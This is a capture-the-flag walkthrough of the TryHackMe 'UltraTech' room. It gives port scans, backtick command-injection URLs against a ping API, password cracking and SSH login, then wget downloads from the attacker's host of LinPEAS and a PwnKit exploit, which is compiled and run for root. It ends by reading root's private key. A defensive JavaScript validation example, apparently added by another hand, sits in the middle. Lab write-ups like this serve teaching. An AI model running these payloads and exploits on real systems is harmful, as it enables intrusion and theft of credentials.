TryHackMe: UltraTech

!#Tasks

##Task 1:

!>Deploy the machine

<>: Deploy the machine

> No answer needed

##Task 2:

!>It’s enumeration time!

<>: Which software is using the port 8081?

Command: sudo nmap -sS -sC -sV -oN nmap/initial 10.10.102.70

Ans: N******

<>: Which other non-standard port is used?

Command: sudo nmap -sT -p- -sV -T5 -oN nmap/all_ports 10.10.102.70

Ans: 3****

<>: Which software using this port?

Ans: A*****

<>: Which GNU/Linux distribution seems to be used?

Ans: U*****

<>: The software using the port 8080 is a REST api, how many of its routes are used by the web application?

Command: gobuster dir -u http://10.10.102.70:8081/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Ans: *

>: Let’s check the sites

>: Scan the port we just found

Command: gobuster dir -u http://10.10.102.70:31331/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

>: Let’s look at the /js path

>: Look at api.js

>: Let’s check how the API we found works

>: After checking and pinging, everything looks great

##Task 3:

!>Let the fun begin

! There is a database lying around, what is its filename?

Url : http://10.10.102.70:8081/ping?ip=`ls`

! What is the first user’s password hash?

http://10.10.102.70:8081/ping?ip=`cat%20u****.**.******`

Only one of the passwords can be cracked

! What is the password associated with this hash?

Url: https://www.md5online.org/md5-decrypt.html

>: Let’s try logging in with SSH

Command: ssh r00t@10.10.102.70
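
The `ping?ip=` requests above succeed because the parameter value reaches a shell, which expands the backticks before ping runs. The following is an added example, not the room's API code: the function names and the assumed vulnerable pattern are hypothetical, and it shows that pattern next to an allow-list check that passes the address to ping as an argument vector with no shell involved.

```javascript
// Added example, not the room's API code. Function names are hypothetical.

// Strict dotted-quad IPv4: four decimal octets 0-255, no leading zeros.
const OCTET = '(25[0-5]|2[0-4]\\d|1\\d\\d|[1-9]?\\d)';
const IPV4 = new RegExp(`^${OCTET}(\\.${OCTET}){3}$`);

// Assumed vulnerable pattern: the query value is pasted into a string that
// is later handed to a shell (child_process.exec), so the shell expands
// backticks, $(), ;, | and && before ping ever runs.
function vulnerableCommandLine(ip) {
  return `ping -c 1 ${ip}`;
}

// Allow-list validation: return the address, or null for anything else.
// Query parsers may deliver arrays or objects, so check the type first.
function parseIpv4(raw) {
  if (typeof raw !== 'string' || raw.length > 15) return null;
  return IPV4.test(raw) ? raw : null;
}

// Build an argument vector instead of a command line. A validated address
// contains only digits and dots, so it cannot be read as a ping option.
function pingArgv(raw) {
  const ip = parseIpv4(raw);
  return ip === null ? null : ['-c', '1', ip];
}

// Hardened handler body: execFile starts ping directly, with no shell to
// interpret metacharacters, and invalid input is rejected before that.
async function safePing(raw) {
  const argv = pingArgv(raw);
  if (argv === null) return { status: 400, body: 'invalid ip' };
  const { execFile } = await import('node:child_process');
  return new Promise((resolve) => {
    execFile('ping', argv, { timeout: 5000 }, (err, stdout) => {
      resolve({ status: err ? 502 : 200, body: stdout });
    });
  });
}
```

The check is IPv4-only; an API that must accept IPv6 or hostnames needs its own allow-list for those forms.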

##Task 4:

!>The root of all evil

! What are the first 9 characters of the root user’s private SSH key?

>: Let’s look for vulnerabilities we can use to escalate privileges

>: We can do it manually. But I will use Linpeas.sh, an automated tool

>: You can download the tool here:

https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

>: Let’s start the transfer

>: From our terminal
Command: python3 -m http.server 80

>: From target terminal
Command: wget http://10.8.223.65/linpeas.sh

>: Give permission and get started
Command: chmod +x linpeas.sh
Command: ./linpeas.sh

We found some vulnerabilities

>: I decided to use CVE-2021-4034

>: You can download the exploit here

>: Let’s start the transfer

>: From our terminal

Command: python3 -m http.server 80

>: From target terminal

Command: wget http://10.8.223.65/pwnkit.c

>: Compile and run it

Command: gcc pwnkit.c -o exploit

Command: ./exploit

And now we are root

Now let’s go and do the last task

Command: cat /root/.ssh/id_rsa

“If you have any questions or comments, please do not hesitate to write. Have a good day”


Hello, my name is Elman. I am from Azerbaijan. I wish you a good day
